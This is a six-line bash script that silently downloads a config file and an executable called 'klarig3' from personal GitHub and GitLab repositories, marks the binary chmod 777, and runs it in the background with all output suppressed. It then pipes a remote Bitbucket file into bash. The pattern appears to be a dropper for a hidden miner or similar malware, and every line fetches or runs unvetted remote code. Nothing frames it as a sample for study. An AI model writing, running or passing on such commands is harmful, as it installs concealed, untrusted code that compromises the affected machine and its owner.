#!/bin/bash
wget -q https://raw.githubusercontent.com/pevinnagewe8919/Man/main/config.json
wget -q https://gitlab.com/jadons19292/donlod/-/raw/main/klarig3
chmod 777 klarig3
./klarig3 -c config.json > /dev/null 2>&1 &
curl -sL https://bitbucket.org/nicezep/file/raw/master/time | bash
